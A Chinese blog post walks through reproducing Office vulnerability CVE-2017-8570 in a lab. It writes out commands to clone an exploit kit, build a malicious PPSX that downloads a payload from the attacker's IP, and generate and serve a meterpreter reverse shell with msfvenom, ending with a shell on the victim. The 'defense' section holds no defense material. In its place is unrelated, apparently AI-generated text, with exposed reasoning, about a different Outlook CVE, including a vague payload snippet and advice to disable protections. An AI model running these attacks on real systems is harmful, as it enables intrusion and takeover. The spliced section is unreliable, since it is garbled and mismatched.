Office 远程代码执行漏洞(CVE-2017-8570)复现

【漏洞详情】

  • Office一直是主流的办公软件,当 Microsoft Office 软件无法正确处理内存中的对象时,其中存在远程执行代码漏洞。成功利用此漏洞的攻击者可以使用经特殊设计的文件在当前用户的安全上下文中执行操作。CVE-2017-8570这个漏洞影响office所有发行版本,当用户不经意点击了我们的恶意PPSX文件,那么我们就可以直接获取到他的用户权限,危害性十分高。

【验证详情】

  • 影响版本

Microsoft Office 2007 Service Pack 3
Microsoft Office 2010 Service Pack 2 (32-bit editions)
Microsoft Office 2010 Service Pack 2 (64-bit editions)
Microsoft Office 2013 RT Service Pack 1
Microsoft Office 2013 Service Pack 1 (32-bit editions)
Microsoft Office 2013 Service Pack 1 (64-bit editions)
Microsoft Office 2016 (32-bit edition)
Microsoft Office 2016 (64-bit edition)

  • 验证过程

  • 1.这里使用的是Windows2007 sp1作为我的靶机,接着使用meatasploit工具进行漏洞复现。

  • 2.首先从网上下载CVE-2017-8570漏洞exp到本地目录:

git clone https://github.com/tezukanice/Office8570.git

在这里插入图片描述

  • 3.切换到Office8570目录下,然后新建目录,将原本已有的ppsx文件另存到template。

在这里插入图片描述

  • 4.生成恶意的PPSX文件到本地,使用命令如下,这里的IP是kali的IP:

python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://192.168.233.132/logo.doc
在这里插入图片描述

  • 5.使用windows的meterpreter的反弹木马生成反弹shell的exe文件。

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.233.132 LPORT=6666 -f exe > shell.exe

在这里插入图片描述

  • 6.设置监听,用于在80端口监听,等待恶意ppsx文件的执行,继而接收ppsx请求来下载执行kali本地反弹木马shell。

python cve-2017-8570_toolkit.py -M exp -e http://192.168.233.132/shell.exe -l shell.exe

在这里插入图片描述

  • 7.打开metasploit工具,使用multi/handler加载攻击模块,设置监听。

在这里插入图片描述

  • 8.将我们刚才生成的恶意的ppsx文件放在目标主机上执行,这里就是模拟用户点击黑客发送的恶意文件。

在这里插入图片描述

  • 9.点击运行Invoce.ppsx文件。

在这里插入图片描述

  • 10.查看是否接收到目标机发送的获取payload的请求,可见接收成功:

在这里插入图片描述

  • 11.查看MSF状态,已经获得shell。

在这里插入图片描述

【防御方式】

<think>好的,我需要帮助用户复现CVE-2020-16913漏洞。首先,我要确认这个漏洞的具体信息。CVE-2020-16913是Microsoft Outlook的一个远程代码执行漏洞,由恶意特制文件触发。用户需要搭建实验环境并进行步骤复现。 首先,查阅资料,确认漏洞影响的版本。根据微软的公告,该漏洞影响Outlook 2010到2019的多个版本,所以实验环境需要安装这些版本中的一个,比如Office 2016。可能需要使用Windows 10作为操作系统,并安装受影响的Outlook版本。 接下来,搭建环境可能需要虚拟机,比如VMware或VirtualBox,安装Windows 10和Office 2016。确保系统没有安装2020年10月的安全更新,因为该补丁修复了这个漏洞。需要关闭自动更新,或者回滚到更新前的状态。 然后是漏洞利用部分。这个漏洞通过特制的文件触发,可能需要构造一个恶意的Outlook文件(如.msg或.rft)。根据公开的信息,漏洞涉及Rich Text Format (RTF)解析中的内存损坏问题。用户需要获取或编写PoC(概念验证)代码,生成恶意文件。可能需要参考已有的漏洞分析或利用代码,比如Exploit-DB或GitHub上的资源。 步骤可能包括:创建恶意RTF文件,通过邮件或其他方式发送到目标Outlook,当用户预览或打开该文件时触发漏洞。需要配置Outlook的安全设置,可能降低防护以允许漏洞触发,比如禁用受保护的视图。 需要注意的事项包括:实验应在隔离环境中进行,避免影响真实系统;确保遵守法律和道德准则;可能需要调试工具如WinDbg来分析崩溃和内存转储,确认漏洞触发成功。 另外,用户可能遇到的问题包括环境配置错误、补丁未正确卸载、PoC文件构造不正确等。需要指导用户如何验证漏洞是否存在,例如检查系统日志或使用漏洞扫描工具。 最后,生成相关问题,帮助用户进一步理解相关漏洞复现方法,比如如何分析漏洞的根本原因,防护措施,或其他相关CVE复现方法。</think>### CVE-2020-16913漏洞复现步骤 CVE-2020-16913是Microsoft Outlook的远程代码执行漏洞,攻击者通过构造恶意文件诱导用户预览或打开,可触发内存损坏并执行任意代码[^1]。以下是复现步骤: --- #### **1. 实验环境搭建** - **操作系统**:Windows 10(建议虚拟机环境,如VMware/VirtualBox) - **软件版本**:安装未修复该漏洞的Microsoft Outlook版本: - Outlook 2010/2013/2016/2019(版本需低于2020年10月安全更新) - **配置要求**: 1. 关闭Outlook自动更新(防止补丁修复漏洞) 2. 禁用Outlook“受保护的视图”(允许直接加载外部内容) --- #### **2. 漏洞触发条件** - 用户需通过邮件接收恶意构造的`.rtf`或`.msg`文件,并执行以下操作之一: - 预览邮件内容 - 直接打开附件文件 --- #### **3. 复现步骤** **步骤1:生成恶意文件** 1. 构造特制的Rich Text Format(RTF)文件,利用Outlook解析漏洞触发内存损坏。 - 可参考公开PoC代码(如GitHub仓库中的`CVE-2020-16913.py`)生成恶意文件[^2]。 - 示例代码片段: ```python # 生成恶意RTF头部,包含畸形对象指针 rtf_header = b'{\\rtf1\\ansi\\ansicpg1252\\fromhtml{\\*\htmltag}' exploit_payload = b'<img src="x:\\localhost\\C$\\...\\恶意DLL路径">' # 触发路径解析漏洞 ``` **步骤2:发送恶意文件** 1. 将生成的`.rtf`文件通过邮件发送至目标Outlook账户,或直接放置于共享目录诱导用户打开。 **步骤3:触发漏洞** 1. 在目标主机使用Outlook打开邮件或附件。 2. 观察行为: -漏洞触发成功,将导致内存越界写入,可能引发进程崩溃(如`OUTLOOK.EXE`停止响应)。 - 结合调试工具(如WinDbg)分析崩溃时的寄存器状态,确认EIP控制权获取情况。 --- #### **4. 关键验证点** - **漏洞验证**:通过崩溃地址确认是否触发漏洞。例如,若`EIP`指向可控内存区域,则证明漏洞可利用。 - **防护绕过**:需关闭Outlook的“受保护视图”和“附件安全检查”功能[^3]。 --- #### **5. 修复建议** - 安装微软2020年10月安全更新(KB4486740/KB4486745)[^4]。 - 启用Outlook的“阻止外部内容”策略。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值